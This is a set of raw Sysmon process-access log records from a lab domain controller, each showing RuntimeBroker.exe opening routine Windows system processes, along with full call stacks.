13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
